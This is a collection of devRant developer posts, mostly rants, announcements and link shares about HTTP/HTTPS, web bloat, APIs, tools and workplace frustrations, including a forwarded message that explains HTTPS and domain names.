https://m.slashdot.org/story/336657
http://cbc.ca/beta/news/...
https://boingboing.net/2018/01/...7 -
There's an awesome devRant infographic (by @trogus) and write-up this morning on Forbes tech: http://forbes.com/sites/... Please share it around!
And if you don't mind, I just posted the article on hacker news, you should be able to find by browsing newest (you might have to click "more") please vote: https://news.ycombinator.com/newest - title is "Developers Who Rant the Most"
Thanks :)5 -
So I have seen this quite a few times now and posted the text below already, but I'd like to shed some light on this:
If you hit up your dev tools and check the network tab, you might see some repeated API calls. Those calls include a GET parameter named "token". The request looks something like this: "https://domain.tld/api/somecall/..."
You can think of this token as a temporary password, or a key that holds information about your user and other information in the backend. If one would steal a token that belongs to another user, you would have control over his account. Now many complained that this key is visible in the URL and not "encrypted". I'll try to explain why this is, well "wrong" or doesn't impose a bigger security risk than normal:
There is no such thing as an "unencrypted query", well besides really transmitting encrypted data. This fields are being protected by the transport layer (HTTPS) or not (HTTP) and while it might not be common to transmit these fields in a GET query parameter, it's standard to send those tokens as cookies, which are as exposed as query parameters. Hit up some random site. The chance that you'll see a PHP session id being transmitted as a cookie is high. Cookies are as exposed as any HTTP GET or POST Form data and can be viewed as easily. Look for a "details" or "http header" section in your dev tools.
Stolen tokens can be used to "log in" into the website, although it might be made harder by only allowing one IP per token or similar. However the use of such a that token is absolut standard and nothing special devRant does. Every site that offers you a "keep me logged in" or "remember me" option uses something like this, one way or the other. Because a token could have been stolen you sometimes need to additionally enter your current password when doings something security risky, like changing your password. In that case your password is being used as a second factor. The idea is, that an attacker could have stolen your token, but still doesn't know your password. It's not enough to grab a token, you need that second (or maybe thrid) factor. As an example - that's how githubs "sudo" mode works. You have got your token, that grants you more permissions than a non-logged in user has, but to do the critical stuff you need an additional token that's only valid for that session, because asking for your password before every action would be inconvenient when setting up a repo
I hope this helps understanding a bit more of this topic :)
Keep safe and keep asking questions if you fell that your data is in danger
Reeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee5 -
Just updated my nodejs http handler.
- You can match request paths via regex now
- Serve paths can be relative or absolute now
- Still 0 dependencies
https://npmjs.com/package/...3 -
Is there any excuse for NOT having a HTTPS connection nowadays?
My university has so many unprotected subdomains that we're supposed to use and LOGIN ON that are not protected. Although these login forms are https protected the rest is not and seems sketchy.27 -
This weekend had everything but sleep :D But it was worth it. We made the game called Dash Wave in 48 hours on Global Game Jam.It was an amazing experience. Here is the link to the game: https://play.google.com/store/apps/...
http://globalgamejam.org/2017/...11 -
For any keyboard lover like me: this little guys are the most valuable things in my setup. Ortholinear keyboards from http://olkb.com I can't recommend them enough. They are fully programmable and comes in kits for you to finish mounting. The red one is a planck and the other is a preonic.
I'm using dsa keycaps from pimpmykeyboard and the switches are gateron blues.
They just opened a new massdrop for the planck, these are already assembled and ready for use. Check it out at https://massdrop.com/buy/...
P.S.: I have nothing to do with the project and I'm not getting paid to post this. Just love them and want to spread the word. Hope someone love them as much as I do.15 -
For those are interested in devBanner project, here is the keynote.
All api calls will be made in
https://devbanner.center
Temporary frontend is available at
http://bashlord.com/devrant-banners
Concept frontend available at
https://cozyplanes.github.io/dB-UI
Contribute to the project at
https://github.com/cozyplanes/...
Docs coming soon!
Current:
https://cozyplanes.gitbooks.io/devb...
We are looking for a frontend developer and logo designer. If you are interested, reach me at cozyplanes@tuta.io (send questions here too)
Questions? Send via email (reply in 24hrs) or comment below by mentioning me.
Cheers!36 -
GUYS I BUILT A FUCKING URL BAR AND IT EXISTS, IT'S ALIGNED, AND IT FUCKING WORKS
It doesn't have a very good check for what is a valid url tho, it is currently working checking for subreddits like /r/<whatever> and it checks if the link begins with http:// or https://. At some point in the near future I want to clean it up a bit, maybe write some regex (oh god kill me now) that'll actually check for a valid url7 -
I miss the good times when the web was lightweight and efficient.
I miss the times when essential website content was immediately delivered as HTML through the first HTTP request.
I miss the times when I could open a twitter URL and have the tweet text appear on screen in two seconds rather than a useless splash screen followed by some loading spinners.
I miss the times when I could open a YouTube watch page and see the title and description on screen in two seconds rather than in ten.
I miss the times when YouTube comments were readily loaded rather than only starting to load when I scroll down.
JavaScript was lightweight and used for its intended purpose, to enhance the experience by loading content at the page bottom and by allowing interaction such as posting comments without having to reload the entire page, for example.
Now pretty much all popular websites are bloated with heavy JavaScript. Your browser needs to walk through millions of bytes of JavaScript code just to show a tweet worth 200 bytes of text.
The watch page of YouTube (known as "polymer", used since 2017) loads more than eight megabytes of JavaScript last time I checked. In 2012, it was one to two hundred kilobytes of HTML and at most a few hundred kilobytes of JavaScript, mostly for the HTML5 player.
And if one little error dares to occur on a JavaScript-based page, you get a blank page of nothingness.
Sure, computers are more powerful than they used to be. But that does not mean we should deliberately make our new software and website slower and more bloated.
"Wirth's law is an adage on computer performance which states that software is getting slower more rapidly than hardware is becoming faster."
Source: https://en.wikipedia.org/wiki/...
A presentation by Jake Archibald from 2015, but more valid than ever: https://youtube.com/watch/...34 -
About browsers and whole SSL CERT thing...
Most likely everyone here noticed, that https site with broken certificate will throw these big red warnings, in your face and there is so much wording like "ITS NOT SECUREEEE" or "ITS HACKEDDD" almost like it was written by passionate fanatic.
But when you are on plaintext http browsers reaction is like ¯\_(ツ)_/¯
Even if you have plaintext with password, it will for example in chromium put small little red thingy that almost no one notices.
I believe that broken cert with some error like invalid date is MORE secure than plaintext password, yet still there is this hypocracy with browsers...
I dont say that broken SSL cert is good, or something, Im just pointing out contrast of "broken" https vs plain http.... One looks for casual Joe like end of the world is coming and second is bearly noticable. Da fuck?
I disagree with this approach18 -
I'M BACK TO MY WEBDEV ADVENTURES GUYS! IT TOOK ME LIKE 4 MONTHS TO STOP BEING SO FUCKING DEPRESSED SO I CAN ACTUALLY STAND TO WORK ON IT AGAIN
I learned that the linear gradient looks cool as FUCK. Honestly not too fond of the colors I have right now, but I just wanted to have something there cause I can change it later. The page has evolved a bunch from my original concept.
My original concept was the bar in the middle just being a URL bar and having links on the sides. If I had kept that, it would have taken me a few hours to get done. But as time went on when I was working on it, my idea kept changing. Added the weather (had a forecast for a while but the code was gross and I never looked at the next days anyways, so I got rid of it and kept the current data). I wanted to attempt an RSS reader, but yesterday I was about to start writing the JavaScript to parse the feeds, then decided "nah", ended up making the space into a todo list.
The URL bar changed into a full command bar (writing the functions for the commands now, also used to config smaller things, such as the user@hostname part, maybe colors, weather data for city and API key, etc)....also it can open URLs and subreddits (that part works flawlessly). The bar uses a regex to detect if it's a legit URL (even added shit so I don't need http:// or https://), and if it's not, just search using duckduckgo (maybe I'll add a config option there too for search engines).
At this very moment it doesn't even take a second to fully load. It fetches weather data from openweathermap, parses it, and displays it, then displays the "user" name grabbing a localstorage value.
I'm considering adding a sidebar with links (configurable obviously, I want everything to be dynamic, so someone else could use my page if they wanted), but I'm not too sure about it.
It's not on git yet because I was waiting until I get some shit finished today before I commit. From the picture, I want to know if anyone has any suggestions for it. Also note that I am NOT a designer. I can't design for shit.12 -
The company I am currently working for is partnering with another startup. Nothing special about that. We should integrate their API into our system. I wasn't involved in the process when it came to checking there API and if it would work with our Systems. The Person who did that already left the company so I was left behind with some internal documentation. In that Documentation is already written that API is basically trash....
After I started integrating the API I found more and more flaws in the design. They are not sending any responses that would help, when a param is missing or the authentication isn't correct, only 500's . I got some documentation from the partner company so i thought it will be fine as long as the Documentation would be accurate. Turns out the documentation isn't even close to be up to date. Wrong content types wrong endpoints, wrong naming. Basically we could not work with that. We shortly contacted the partner Company. After a few WEEKS we got a response that they updated the Documentation what was right but still not everything was correct. At this point I lost my mind. I researched a little bit about them, the company is founded from 2 young people who basically came strait out of the University and doest have any experience or idea how to build an API. I investigated a little bit there websites.
They have an Admin panel on the base domain from their API but it is only accessible via HTTP. Like WTF , They use HTTP for an Admin Panel this must be a joke right?
They use Cloudflare without a HTTP to HTTPS redirection ???
I really had not that much time to research in there website but if I find these things in 5 minutes I don't want to know what I can find in like an hour.
At the end we will still use them as partners because surprise surprise our company already sold the product that uses their API.
I know that I will be the person who has to help fixing this shit when it breaks and it will break 1000% JUST FUCK THIS SHIT. FUCK THE PARTNER COMPANY. FUCK THERE API.2 -
Right, I've been here before.
Our app requires an internet connection, and one of our clients wants to roll it out on a strictly managed network.
We told them which addresses our app communicates with and their network team opened them up for traffic. Should work, right?
Nope, doesn't work.
So I request them to use Fiddler to do some debugging of the network traffic, and lo and behold, it does work when Fiddler is active.
One important detail is that Fiddler uses it's own SSL certificate to debug HTTPS communications. I've had moments where expired certificates were the cause of things not working and running Fiddler "fixes" this because of their own certificate.
So I point this out in numerous mails to their network team, every time I get a response saying "nah, that can't be it".
I keep insisting "I have had this before, please check if any installed Root CA Certificates is expired"
At this point I'm certain they have updates turned off on these machines, and their certificates must not have been updated for a long time.
At one point they come back to me. "Hey, when Fiddler is off, WireShark shows the app communicating with ICMP calls, but when it's on it shows HTTP calls instead".
...YOU'RE THE SUPPOSED NETWORK EXPERTS?! You think data can be send via ICMP? Do you even know what ICMP is? Of course you'll see ICMP calls when the network is rejecting the packages instead of HTTP calls when everything's fine.
(ICMP is used to communicate errors)
I'm trying to keep my patience with these guys until they find exactly what's wrong because even I am somewhat grasping at straws right now. But things like this makes me doubt their expertise...6 -
Here nerds. Here are some Dev Books for free!
Http://Goalkicker.com - Has like 50 categories of developing Languages and tools notes. iOS pdf has 800 pages. Java has 900!
And if youre living under a rock, here's a github repo of 1,044 PDFS (last I checked) - https://github.com/tpn/pdfs
Go learn something!4 -
Just finished watching the Black Box [worth it!].
I've noticed a few scenes related to IT&Dev. I thought I'll share them here.
So the BlackBox system runs on Fedora 32 with what was the Mainline kernel at that time - 5.76.20. And some HTTP webserver (nginx) for some reason... go figure!
And for some reason, the Black Box keeps making requests to https://www.rescuetime.com . IDK why nor how it's related, but it's there.
And it's got quemu installed (there is a virbr0 bridge and vnet0 listed).4 -
Just yesterday I found out that a multimillion euro corporation still uses Http (not https) rest end points, with the only basic authentication mechanism...
It only provides data to sales and inventory management, so I'm guessing it's not f*ing critical enough x.x4 -
So I've been developing something I call P.A.R.N! (terrible name, I know) that recursively scans a folder for images and serves up a picture gallery via http using those images.
What do you all think?
https://github.com/AdamWelch1/...
I just wanted to share my latest personal project here 😶
The funnest part for me was writing the web server part :P20 -
Order now! iPhone 8 Xplode
Englisch: https://sputniknews.com/science/...
Japanese Twitter: https://twitter.com/Magokoro0511/...
Appledaily.com.tw: http://appledaily.com.tw/column/...14 -
Why is it HTTPS instead of SHTTP. I mean, apple doesn't call it the Phonei. Oh wait, just looks at "SHTTP" again... now I know why.4
-
The cleaning lady saga continues...
(previous: https://devrant.com/rants/1850777)
Had an appointment with their manager, stuff gets discussed and coordinated at a 3x slower pace than if I'd done it myself (as usual because fuck efficiency when there's muggles involved -_-), yada yada.
*mail addresses for contact start getting discussed*
Incompetent fuck of a manager: And you $realName, your email address is $company@nixmagic.com, then changed to $nickname@nixmagic.com? Mind explaining this?
Me: Oh yeah that's just because I give out different email addresses to each contact person when it involves public forms or registrations, helps with spam prevention and putting the company name of the correspondent in there helps with easy recognition when some company's database leaks and I start getting a lot of spam on that mailbox.
IFOM: Really.. we actually weren't sure whether we should reply to something with our company name in it.. you know, not sure whether it's legit etc. Why would anyone want to use one of our email addresses as theirs?
… Let that sink in for a moment. They think that $company@nixmagic.com is theirs? Just because it's their domain (minus TLD) in front of MY FUCKING DOMAIN? How about you start by learning how email addresses work first, because clearly you have no fucking clue about it. Are you the kind of brainless fucks that get lured in by http://totallylegitbank.com.freehost.com/... scams? Fucking stupid piece of fucking shit.
Oh, and when you're using MS Exchange, of course you can't know that when you're having your own domain, you actually also own every fucking mailbox on it, because Microshaft doesn't allow you to have more than n amount of mailboxes, unless you gobble up money for them. But you know what, in my case it's a fucking catch-all domain running Linux on its servers, so yeah I can use whatever the fuck I want in front of it, including your stupid fucking cleaning company.
IFOM: And then there's your current designated email address. $nickname@nixmagic.com..
Oh you're going to criticise that as well?! Yeah condor is my fucking nickname all over the internet, and my username on all my systems. That's why I use it. But you know what else is an email address that you might come across, because people are shallow idiots like that? ILoveBigTits69@gmail.com or something like that. You know what, how about I address you next time from ILoveBigTits69_OhAndYoursAreAWashboard@nixmagic.com, because you know what? I CAN FUCKING DO THAT. But you know, I at least am halfway fucking professional about my business-related stuff, so I won't because I really don't want to be associated with such an email address. So don't you fucking dare to criticize me for using my fucking nickname instead of my real name.
Long story short, people are fucking idiots.6 -
Jesus fuck Gigabyte motherboards downloading and installing firmware updates over HTTP no fucking S
https://tomshardware.com/news/...10 -
Just went to book something online. About to click the "Pay" button and noticed the page wasn't secure. Who the hell, in 2017, captures credit card details via insecure 'http'??? And 'https' worked on the home page but not the payment page!! Backed out of that, messaged them and we'll see if anything comes of it.3
-
Looks like Linux is going the way of Python.
http://archive.fo/1iGmk
And Linus is probably being pushed out.
https://archive.fo/lMcUA16 -
oauth (Yahoo) just opened sourced their data-processing & search engine!
It looks fricken cool, can't wait to play with it... and even more I can't wait to see what people make with it!
Yahoo!
[announcement](https://oath.com/press/...)
[docs](http://docs.vespa.ai/documentation/...)4 -
Which open source documentation tool would you prefer among these:
https://docusaurus.io
https://docsify.js.org
http://daux.io
I'm leaning towards docusaurus.io. Any thoughts?5 -
FYI. Copied from my FB stalked list.
Web developer roadmap 2018
Common: Git, HTTP, SSH, Data structures & Algorithms, Encoding
------
Front-end: HTML, CSS, JavaScript > ES6, NPM, React, Webpack, Responsive Web, Bootstrap
------
Back-end: PHP, Composer, Laravel > Nginx, REST, JWT, OAuth2, Docker > MariaDB, MemCached, Redis > Design Patterns, PSRs
------
DevOps: Linux, AWS, Travis-CI, Puppet/Chef, New Relic > Docker, Kubernetes > Apache, Nginx > CLI, Vim > Proxy, Firewall, LoadBalancer
------
https://github.com/kamranahmedse/...2 -
I really hate it when I try to be careful with disclosing information of my employer in a rant on Reddit but the CTO who fires me go there and replies in full detail in an attempt to shame you. http://archive.is/sfP00
Because I have bigger balls (or a small brain, depending how you see it) I'll leave the post on but with my response to his comment on my thread as anybody may dig my Reddit account before hiring me for a job.
And yes, he is the same guy I refer in this past rant https://devrant.com/rants/1089376/...
It fucking sucks that the CTO will sleep safe and sound and I can't do much than looking for another job and contribute to FLOSS projects while I build new stuff to improve my skills all this while money is running out. I'm glad I'm living with my parents after this shit hit the fan, less stuff to worry about, but this is not life.13 -
FYI if you have ES file explorer get rid of it cause it has a major vuln that lets other extract files from your phone
https://xda-developers.com/es-file-...
There are many better alternatives, i personally use FX.
…
...
...WHY TF DOES A FILE EXPLORER RUN AN HTTP SERVER IN BACKGROUND ?!24 -
"There's more to it"
This is something that has been bugging me for a long time now, so <rant>.
Yesterday in one of my chats in Telegram I had a question from someone wanting to make their laptop completely bulletproof privacy respecting, yada yada.. down to the MAC address being randomized. Now I am a networking guy.. or at least I like to think I am.
So I told him, routers must block any MAC addresses from leaking out. So the MAC address is only relevant inside of the network you're in. IPv6 changes this and there is network discovery involved with fandroids and cryphones where WiFi remains turned on as you leave the house (price of convenience amirite?) - but I'll get back to that later.
Now for a laptop MAC address randomization isn't exactly relevant yet I'd say.. at least in something other than Windows where your privacy is right out the window anyway. MAC randomization while Nadella does the whole assfuck, sign me up! /s
So let's assume Linux. No MAC randomization, not necessary, privacy respecting nonetheless. MAC addresses do not leak outside of the network in traditional IPv4 networking. So what would you be worried about inside the network? A hacker inside Starbucks? This is the question I asked him, and argued that if you don't trust the network (and with a public hotspot I personally don't) you shouldn't connect to it in the first place. And since I recall MAC randomization being discussed on the ISC's dhcp-users mailing list a few months ago (http://isc-dhcp-users.2343191.n4.nabble.com/...), I linked that in as well. These are the hardcore networking guys, on the forum of one of the granddaddies of the internet. They make BIND which pretty much everyone uses. It's the de facto standard DNS server out there.
The reply to all of this was simply to the "don't connect to it if you don't trust it" - I guess that's all the privacy nut could argue with. And here we get to the topic of this rant. The almighty rebuttal "there's more to it than that!1! HTTPS doesn't require trust anymore!1!"
... An encrypted connection to a website meaning that you could connect to just about any hostile network. Are you fucking retarded? Ever heard of SSL stripping? Yeah HSTS solves that but only a handful of websites use it and it doesn't scale up properly, since it's pretty much a hardcoded list in web browsers. And you know what? Yes "there's more to it"! There's more to networking than just web browsing. There's 65 THOUSAND ports available on both TCP and UDP, and there you go narrow your understanding of networking to just 2 of them - 80 and 443. Yes there's a lot more to it. But not exactly the kind of thing you're arguing about.
Enjoy your cheap-ass Xiaomeme phone where the "phone" part means phoning home to China, and raging about the Google apps on there. Then try to solve problems that aren't actually problems and pretty vital network components, just because it's an identifier.
</rant>
P.S. I do care a lot about privacy. My web and mail servers for example do not know where my visitors are coming from. All they see is some reverse proxies that they think is the whole internet. So yes I care about my own and others' privacy. But you know.. I'm old-fashioned. I like to solve problems with actual solutions.11 -
Has been a long time since I'm appreciating working with GRPC.
Amazingly fast and full-featured protocol! No complaints at all.
Although I felt something was missing...
Back in the days of HTTP, we were all given very simple tools for making requests to verify behaviours and data of any of our HTTP endpoints, tools like curl, postman, wget and so on...
This toolset gives us definitely a nice and quick way to explore our HTTP services, debug them when necessary and be efficient.
This is probably what I miss the most from HTTP.
When you want to debug a remote endpoint with GRPC, you need to actually write a client by hand (in any of the supported language) then run it.
There are alternatives in the open source world, but those wants you to either configure the server to support Reflection or add a proxy in front of your services to be able to query them in a simpler way.
This is not how things work in 2018 almost 2019.
We want simple, quick and efficient tools that make our life easier and having problems more under control.
I'm a developer my self and I feel this on my skin every day. I don't want to change my server or add an infrastructure component for the simple reason of being able to query it in a simpler way!
However, This exact problem has been solved many times from HTTP or other protocols, so we should do something about our beloved GRPC.
Fine! I've told to my self. Let's fix this.
A few weeks later...
I'm glad to announce the first Release of BloomRPC - The first GRPC Client GUI that is nice and simple,
It allows to query and explore your GRPC services with just a couple of clicks without any additional modification to what you have running right now! Just install the client and start making requests.
It has been built with the Electron technology so its a desktop app and it supports the 3 major platforms, Mac, Linux, Windows.
Check out the repository on GitHub: https://github.com/uw-labs/bloomrpc
This is the first step towards the goal of having a simple and efficient way of querying GRPC services!
Keep in mind that It is in its first release, so improvements will follow along with future releases.
Your feedback and contributions are very welcome.
If you have the same frustration with GRPC I hope BloomRPC will make you a bit happier!3 -
Dear fellow developers: Let's talk about the Internet. If you're reading this post, you've probably heard of it and are comfortable using it on a regular basis. You may even develop software that works over the internet, and that's fine and great! But you have to draw the line somewhere, and that line has been pushed farther and farther back as time goes on.
Let's talk about video games. The first game that really got me into FPSes was Team Fortress 2. Back in the day, it had a great community of casual and competitive groups alike, and there were hats! Underneath the hood was a massive number of servers. Some were officially hosted, some were run by independent communities. It had a built-in browser and central index where you could find every publically-available server and connect to it. You could even manually input connection details if that failed. In my opinion, this was a near-perfect combination of optimal user-experience and maximum freedom to run whatever the hell you wanted to. Even today, if Valve decided to stop hosting official servers, the smaller communities could still stay afloat. Fifteen years in the future, after all demand has died off, someone can still recover the server software and play a game with their kids.
Now, contrast that to a game like Overwatch. Also a very pivotal game in the FPS world, and much more modern, but what's the underlying difference in implementation? NO SUPPORT FOR SELF-HOSTED SERVERS. What does that mean when Blizzard decides to stop hosting its central servers? IT DIES. There will be no more multiplayer experience, not now, not ever. You will never be able to fully share this part of your history with future generations.
Another great example is the evolution of voice chat software. While I will agree that Discord revolutionized the market, it took away our freedom to run our own server on our own hardware. I used to run a Mumble server, now it has fallen out of use and I miss it so much.
Over time, client software has become more and more dependent on centrally-hosted services. Not many people will think about how this will impact the future usability of the product, and this will kill our code when it becomes legacy and the company decides to stop supporting it. We will have nothing to give to future generations; nobody will be able to run it in an emulator and fully re-experience it like we can do with older games and software.
This is one of the worst regressions of our time. Think about services like IRC, SMTP, SSH, even HTTP, how you're so easily able to connect to any server running those protocols and how the Internet would change if those were replaced with proprietary software that depended on a central service.
(Relevant talk (16:42): https://youtu.be/_e6BKJPnb5o?t=1002)6 -
Cool things I found out recently™:
[#1, August 2017]
1) devRant (hehe~ ★)
https://play.google.com/store/apps/...
2) DeepL Translator
https://www.deepl.com
3) Lanota (an awesome mobile music/rhythm game) (I'm fanboying too much about it, sorry :'D)
https://play.google.com/store/apps/...
4) Burrito Galaxy 65
http://burritogalaxy.com
5) USB type C Simulator
https://play.google.com/store/apps/...
6) bill wurtz('s YouTube channel. Heh, you thought I was just gonna call a person "a thing"?)
https://youtube.com/user/billwurtz/
---
What do you think? What is your list? ^^undefined list devrant yeeeee ★ !rant cool things i found out recently this is gonna be a thing okay maybe this is not gonna be a thing9 -
The other day those of us in the codrTalk telegram group we're joking around and, long story short, I now own the domain http://emotionoverflow.com
This is why I shouldn't have access to a credit card.
Telegram group link: https://t.me/codrTalk11 -
Little news for fellow Linux users and Windows users who want to switch.
WINE 3.0 has been released recently and I haven't seen anyone mention it here so I thought I'd share. It features support for Direct3D 11.
https://winehq.org/news/2018011801
http://omgubuntu.co.uk/2018/01/...
Also, apparently, Photoshop CC 2018 works: https://imgur.com/a/k0HI07 -
Pull-to-refresh in mobile web browsers is useless and annoying.
In mid-2019, the #disable-pull-to-refresh-effect option was removed from chrome://flags on Chrome for Android (version 76) for no apparent reason. The top answer in the Google product forum was to beg for this option to be reinstated through the browser's feedback form ( http://web.archive.org/web/... ). Needless to say, that has been futile.
Why is that a problem? The pull-to-refresh gesture not only is unnecessary due to the quickly accessible refresh button in the menu right next to the URL bar, but also causes unsolicited refreshes when quickly scrolling to the top of the page. This drains both the battery and the mobile data plan, in addition to adding an annoying delay.
I would like to use my web browser like a web browser, not a social media app. Besides, the Twitter web app has its own pull-to-refresh implementation in the notification feed.
Without pull-to-refresh, the user has the freedom to scroll up quickly without risking inadvertently reloading the page. If media was playing while an unwanted pull-to-refresh occurs, the user needs to seek for the last playing position, which could take upwards of a minute if the last position is unknown.
Imagine a desktop/laptop web browser reloading because you scroll against the top. Imagine you reach the top of the page but you have not stopped turning the scroll wheel yet, and then a white circle with a blue spinning refresh icon appears at the center top of the window and the page, and then you have to wait for the page to finish loading, and you also need to seek the last playing position of a video or audio track. Wouldn't that be ridiculous?
Any web browser vendor that enforces pull-to-refresh on its users basically begs users to seek an alternative.7 -
As many here (incl. me) like the Silicon Valley series, T.J Miller (playing as Erlich Bachman in the series) has been again in the news for his (mis)behaviour, this time for seemingly calling in a fake bomb threat on somebody, while being drunk.
Do you think the producers would go as far as remove him from the series for the rolling drama? if so, can you imagine the series being without him?
Sources:
- https://justice.gov/usao-ct/pr/...
- https://mashable.com/2018/04/...
- http://dailymail.co.uk/news/...6 -
My new workstation is ready 💪🏼
Table top: http://m.ikea.com/us/en/...
Sit/stand electric frame: https://autonomous.ai/diy-smart-des...
Shelf: http://m.ikea.com/us/en/...
Shelf legs: http://m.ikea.com/us/en/...2 -
RFC for 700 HTTP Status Codes
https://github.com/joho/7XX-rfc
o 703 - Explosion
o 728 - It works in my timezone
o 732 - Fucking Unic💩de
o 791 - The Internet shut down due to copyright restrictions
o 797 - This is the last page of the Internet. Go back3 -
Boss: Hey! I know you just got everything working on that new project. But good news: I have a repo you can clone and we can work together. So just clone that and look at my changes, find something that’s broken, and work away. Oh, I also modified everything to use HTTPS locally. HTTP won’t work anymore. Alright, I’m off on vacation! Ciao!
… and that’s the story of how I spent a day and a half fighting with NPM, Brew, setting up a new CA and self-signed cert, and getting passenger to work with it. The good news is that I can connect locally via 443. The bad news is all assets use http and are thus blocked for being mixed-content. And idk how to fix it. Joy!
Not mentioned: npx removing a required package every time I run it, version mismatches, and the usual NPM problems.11 -
API Documentation: All API request should be made over https connections.
Me: Ok, (sees url bar), SECURE, good!
(sees curl code)
curl -X GET 'http://shittyapi.com/api/v2/users'
Me: (gasps) huh?
(heads to http://shittyapi.com/api/v2)
Me: Ok, (sees address bar) NOT SECURE
.
.
.
.
.
(long silence)5 -
{ !rant, devlog }
I finished an exercise on Deletable Primes at http://catcoder.codingcontest.org just as part of my training for when I'm going to attend hackathons.
I could've done better than 08m 44s, by 3 minutes, if I hadn't made my initial IsPrime() method so damn inefficient that a large number wouldn't stop calculating, making me quickly debug and find the issue...
I used C#, because that's the language I currently just write most of my stuff in (and thus, I'm the fastest in out of all langs I know)
Gist: https://gist.github.com/filthycodin...2 -
My grandfather is at age 72 & don't know much about technology. He forward me this message on whatsapp bcz I'm a software engineer. He made my day...
What is the difference between http and https ?
Time to know this with 32 lakh debit cards compromised in India.
Many of you may be aware of this difference, but it is
worth sharing for any that are not.....
The main difference between http:// and https:// is all
about keeping you secure
HTTP stands for Hyper Text Transfer Protocol
The S (big surprise) stands for "Secure".. If you visit a
Website or web page, and look at the address in the web browser, it is likely begin with the following: http:///.
This means that the website is talking to your browser using
the regular unsecured language. In other words, it is possible for someone to "eavesdrop" on your computer's conversation with the Website. If you fill out a form on the website, someone might see the information you send to that site.
This is why you never ever enter your credit card number in an
Http website! But if the web address begins with https://, that means your computer is talking to the website in a
Secure code that no one can eavesdrop on.
You understand why this is so important, right?
If a website ever asks you to enter your Credit/Debit card
Information, you should automatically look to see if the web
address begins with https://.
If it doesn't, You should NEVER enter sensitive
Information....such as a credit/debit card number.
PASS IT ON (You may save someone a lot of grief).
GK:
While checking the name of any website, first look for the domain extension (.com or .org, .co.in, .net etc). The name just before this is the domain name of the website. Eg, in the above example, http://amazon.diwali-festivals.com, the word before .com is "diwali-festivals" (and NOT "amazon"). So, this webpage does not belong to amazon.com but belongs to "diwali-festivals.com", which we all haven't heard before.
You can similarly check for bank frauds.
Before your ebanking logins, make sure that the name just before ".com" is the name of your bank. "Something.icicibank.com" belongs to icici, but icicibank.some1else.com belongs to "some1else".
👆 *Simple but good knowledge to have at times like these* 👆3 -
A facebook cover photo inspired by this rant: https://www.devrant.io/rants/375271
!rant
I used this font: http://marksimonson.com/fonts/view/...
and finally, I used this psd (gimp should be able to use it too): http://medialoot.com/item/...6 -
Just started using the Dropbox API. Want to do a simple directory listing of my files. Sends HTTP GET request at https://api.dropboxapi.com/2/files/....
"Error in call to API function "files/list_folder": Your request's HTTP request method is "GET". This function only accepts the HTTP request method "POST"."
What. The. Fuck. Dropbox.
HTTP POST is for creating a new instance of a resource. HTTP GET is for reading. GET guarantees server state is not changed while POST does not. I want to fucking list a directory, not put stuff in it.1 -
I have no idea how this tab opened, maybe I clicked something, but it's really interesting to look through, really beautiful websites (though personally some of those ratings seem harsh), especially interesting to gather new ways and ideas, some get as creative as letting you walk through a virtual museum of some sorts, with some nice music playing in the background.
the main website:
- https://www.awwwards.com/
Virtual museum:
- http://vr.jadedalloul.com/
- https://awwwards.com/sites/...4 -
I don't remember/saw if somebody posted it in this much detail, but here's how one developer essentially showed how broken npm once again is, by just removing all his published packages, basically breaking thousands of other packages that depended on it, very interesting read, especially to understand how npm can't be relied on.
https://theregister.co.uk/2016/03/...
http://blog.npmjs.org/post/...
https://medium.com/@mproberts/...
https://arstechnica.com/information...4 -
Strap in...
- Previous employer
- 3rd party partner firm
- integration link between both over SOAP
- Both sides riddled with poor code and messed up political structures (partner firm CEO is an investor in my employer)
- Doing a deployment to update to https (I know)
- Keep http endpoint live
- Other side starts shitting itself
- Diagnose
- Not us
- feelsgoodman.tiff
- Get angry email
- Explain not us
- Back and forth
- Tell client it’s “irrelevant” on https issue, it’s their side that’s gone wrong
- Get angry reply with boss cc’d about how nothing is “irrelevant” for the client
- We all had to have a make up meeting and meal
- Client was calm and reasonable, all agreed we just snapped and it wouldn’t happen again
- 2 weeks later
- Their system shits itself again and suddenly we’re on the hook
- BA on my team (smarmy little bastard) constantly fucking me off
- Get so close to actually screaming and hitting him
So yeah. I don’t tend to hold that a job is more important to me than my dignity.
I have and will never hold my tongue for the sake of a job, I’m not gonna put up with people shouting / belittling / backstabbing etc. -
oh, I have a few mini-projects I'm proud of. Most of them are just handy utilities easing my BAU Dev/PerfEng/Ops life.
- bthread - multithreading for bash scripts: https://gitlab.com/netikras/bthread
- /dev/rant - a devRant client/device for Linux: https://gitlab.com/netikras/...
- JDBCUtil - a command-line utility to connect to any DB and run arbitrary queries using a JDBC driver: https://gitlab.com/netikras/...
- KubiCon - KuberneterInContainer - does what it says: runs kubernetes inside a container. Makes it super simple to define and extend k8s clusters in simple Dockerfiles: https://gitlab.com/netikras/KubICon
- ws2http - a stateful proxy server simplifying testing websockets - allows you to communicate with websockets using simple HTTP (think: curl, postman or even netcat (nc)): https://gitlab.com/netikras/ws2http -
To those of you who want to remember things longer and faster. Especially for students. There is an efficient solution to this pain. It is free, btw.
"Sans Forgetica".
There's now a new font which is created by "a multidisciplinary team of designers and behavioural scientists from RMIT University".
This font uses "the principles of cognitive psychology to help you to better remember your study notes".
Editor's note: Yes, I was too lazy to write it on my own. The more you know ;)
Links:
http://sansforgetica.rmit/
https://t3n.de/news/...12 -
I have to share this. These guys are unbelievable! They claim they will build this console that will run a modded Debian Linux. Ok so far...
But then they say that it will run Windows games...
Wine you may think?!
NOOOO.
They say they will make a 'revolutionary' motherboard, that will RUN WINDOWS GAMES (?!?!?), WITHOUT WINDOWS!!!! And they will do this by putting a fucking FPGA chip on the board!!! That will INTERPRET .EXE FILES (IN HARDWARE LEVEL!!!)
They must be gods to run an .exe file using nothing but (V)HDL without the shared libraries and at hardware level!
FUCK! I'M MAD!!!
Scammers gonna scam!
http://www.project-novatio.com
P.S.: FPGA - https://en.m.wikipedia.org/wiki/...7 -
I believe Common Lisp people are up to something:
http://lisp-lang.org
and
https://www.quicklisp.org/beta/
......I ak fucking stocked at this way of coding making a comeback. I wonder if It has anything to do with M.L being all the rage now a days.
Oh well....M x slime3 -
This is the ferrocube, a memory cell of the Setun' ([sew-toon]) — the only non-experimental, production ternary computer. It was developed in Soviet Union.
https://en.wikipedia.org/wiki/Setun
https://earltcampbell.com/2014/12/...
http://putcurlybrace.com/2020/01/...2 -
